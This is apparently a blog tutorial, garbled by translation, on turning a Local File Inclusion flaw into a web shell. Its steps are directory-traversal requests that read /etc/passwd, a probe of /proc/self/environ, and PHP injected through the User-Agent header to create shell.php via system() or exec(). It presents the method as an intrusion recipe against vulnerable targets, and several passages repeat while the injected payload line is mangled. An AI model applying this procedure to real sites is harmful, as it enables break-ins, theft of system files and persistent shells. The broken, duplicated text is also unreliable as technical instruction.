1 - Introduction
2 - Discovery LFI
3 - check if / proc / self / environ is accessible
4 - malicious code injection
5 - Access to the shell
6 - Thanks
In this tutorial I will show how to obtain a shell on a site using your Local File Inclusion and
injecting malicious code in proc / self / environ.Este a tutorial that explains everything step by step.
- Now a site to find a vulnerable target to Local File Inclusion.Am found to verify
www.website.com/view.php?page=contact.php
- Now to replace contact.php with .. / and the URL will become
www.website.com/view.php?page=../
and have an error.
Warning: include (../) [function.include]: failed to open stream: No such file or directory in / home / sirgod / public_html / website.com / view.php on line 1337 good chance to have a vulnerability type Local File Inclusion.Sa move on.
2 - Discovery LFI
3 - check if / proc / self / environ is accessible
4 - malicious code injection
5 - Access to the shell
6 - Thanks
>> 1 - Introduction
In this tutorial I will show how to obtain a shell on a site using your Local File Inclusion and
injecting malicious code in proc / self / environ.Este a tutorial that explains everything step by step.
>> 2 - Discovery LFI
- Now a site to find a vulnerable target to Local File Inclusion.Am found to verify
www.website.com/view.php?page=contact.php
- Now to replace contact.php with .. / and the URL will become
www.website.com/view.php?page=../
and have an error.
Warning: include (../) [function.include]: failed to open stream: No such file or directory in / home / sirgod / public_html / website.com / view.php on line 1337 good chance to have a vulnerability type Local File Inclusion.Sa move on.
- Check if we can access the
www.website.com/view.php?page=../../../etc/passwd
have an error and the file etc / passwd is not included.
Warning: include (../) [function.include]: failed to open stream: No such file or directory in / home / sirgod / public_html / website.com / view.php on line 1337 climbed some directors
www.website.com/view.php?page=../../../../../etc/passwd
We successfully included file etc / passwd.
etc/passwd
to see if it is vulnerable to Local File Inclusion.Samake a request:www.website.com/view.php?page=../../../etc/passwd
have an error and the file etc / passwd is not included.
Warning: include (../) [function.include]: failed to open stream: No such file or directory in / home / sirgod / public_html / website.com / view.php on line 1337 climbed some directors
www.website.com/view.php?page=../../../../../etc/passwd
We successfully included file etc / passwd.
root: x: 0:0: root: / root: / bin / bash bin: x: 1:1: bin: / bin: / sbin / Nologin daemon: x: 2:2: daemon: / sbin: / sbin / Nologin adm: x: 3:4: adm: / var / adm: / sbin / Nologin
lp: x: 4:7: lp: / var / spool / lpd: / sbin / Nologin sync: x: 5:0: sync: / sbin: / bin / sync shutdown: x: 6:0: shutdown: / sbin : / sbin / shutdown halt: x: 7:0: halt: / sbin: / sbin / halt
mail: x: 8:12: mail: / var / spool / mail: / sbin / Nologin news: x: 9:13: news: / etc / news: UUCP: x: 10:14: UUCP: / var / spool / UUCP: / sbin / Nologin
operator: x: 11:0: operator: / root: / sbin / Nologin games: x: 12:100: games: / usr / games: / sbin / Nologin test: x: 13:30: test: / var / test : / sbin / Nologin ftp:x:14:50:FTP
User: / var / ftp: / sbin / Nologin nobody: x: 99:99: Nobody: /: / sbin / Nologin
lp: x: 4:7: lp: / var / spool / lpd: / sbin / Nologin sync: x: 5:0: sync: / sbin: / bin / sync shutdown: x: 6:0: shutdown: / sbin : / sbin / shutdown halt: x: 7:0: halt: / sbin: / sbin / halt
mail: x: 8:12: mail: / var / spool / mail: / sbin / Nologin news: x: 9:13: news: / etc / news: UUCP: x: 10:14: UUCP: / var / spool / UUCP: / sbin / Nologin
operator: x: 11:0: operator: / root: / sbin / Nologin games: x: 12:100: games: / usr / games: / sbin / Nologin test: x: 13:30: test: / var / test : / sbin / Nologin ftp:x:14:50:FTP
User: / var / ftp: / sbin / Nologin nobody: x: 99:99: Nobody: /: / sbin / Nologin
>> 3 - check if / proc / self / environ is accessible
- Now to see if / proc / self / environ is accesibil.O to replace etc / passwd with / proc / self / environ
www.website.com/view.php?page=../../../ ... LF / environ
If you get something like
DOCUMENT_ROOT = / home / sirgod / public_html GATEWAY_INTERFACE = CGI/1.1 HTTP_ACCEPT = text / html, application / xml, q = 0.9, application / xhtml + xml, image / png,
image / jpeg, image / gif, image / x-xbitmap, * / *, q = 0.1 PHPSESSID = HTTP_COOKIE = HTTP_HOST =www.website.com 134cc7261b341231b9594844ac2ad7ac
http://Http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_REFERER = HTTP_USER_AGENT = Opera/9.80 (Windows NT 5.1, U , en) Presto/2.2.15
Version/10.00 PATH = / bin: / usr / bin QUERY_STRING = view =..% 2F ..% 2F ..% 2F ..% 2F ..% 2F ..% 2Fproc% 2Fself% 2Fenviron REDIRECT_STATUS = 200 REMOTE_ADDR = 6x .1 xx.4x.1xx
REMOTE_PORT = 35665 REQUEST_METHOD = GET REQUEST_URI = / index.php? View =..% 2F ..% 2F ..% 2F ..% 2F ..% 2F ..% 2Fproc% 2Fself% 2Fenviron
SCRIPT_FILENAME = / home / sirgod / public_html / index.php SCRIPT_NAME = / index.php SERVER_ADDR = 1xx.1xx.1xx.6x SERVER_ADMIN = webmaster@website.com
SERVER_NAME = www.website.com SERVER_PORT = 80 SERVER_PROTOCOL = HTTP/1.0 SERVER_SIGNATURE =
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV / 2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80
proc / self / environ is accesibil.Daca get a blank page, an error means it is not accessible or operating system is FreeBSD.image / jpeg, image / gif, image / x-xbitmap, * / *, q = 0.1 PHPSESSID = HTTP_COOKIE = HTTP_HOST =www.website.com 134cc7261b341231b9594844ac2ad7ac
http://Http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_REFERER = HTTP_USER_AGENT = Opera/9.80 (Windows NT 5.1, U , en) Presto/2.2.15
Version/10.00 PATH = / bin: / usr / bin QUERY_STRING = view =..% 2F ..% 2F ..% 2F ..% 2F ..% 2F ..% 2Fproc% 2Fself% 2Fenviron REDIRECT_STATUS = 200 REMOTE_ADDR = 6x .1 xx.4x.1xx
REMOTE_PORT = 35665 REQUEST_METHOD = GET REQUEST_URI = / index.php? View =..% 2F ..% 2F ..% 2F ..% 2F ..% 2F ..% 2Fproc% 2Fself% 2Fenviron
SCRIPT_FILENAME = / home / sirgod / public_html / index.php SCRIPT_NAME = / index.php SERVER_ADDR = 1xx.1xx.1xx.6x SERVER_ADMIN = webmaster@website.com
SERVER_NAME = www.website.com SERVER_PORT = 80 SERVER_PROTOCOL = HTTP/1.0 SERVER_SIGNATURE =
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV / 2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80
>> 4 - malicious code injection
- Now let us inject malicious code in proc / self / environ.Cum we do this? Inject code in HTTP User-Agent header.
Use Tamper Data addon's for Firefox to change User-Agent-ul.Porniti Tamper date and make a request to the URL:
www.website.com/view.php?page=../../../ ... LF / environ
Choose Tamper and User-Agent field write the following code:
A shell.php available @ ;?>
Then, submit the request.
Our command will be executed in
through function system (), and our shell will be creat.Daca does not work, try exec () because system () can be
restricted on a server in php.ini
>> 5 - Access to the shell
- Now check if our code has been injected with malicious succes.Sa see if the shell is present.
www.website.com / shell.php
Shell was successful.
i hope you enjoy!!!
Post a Comment Blogger Facebook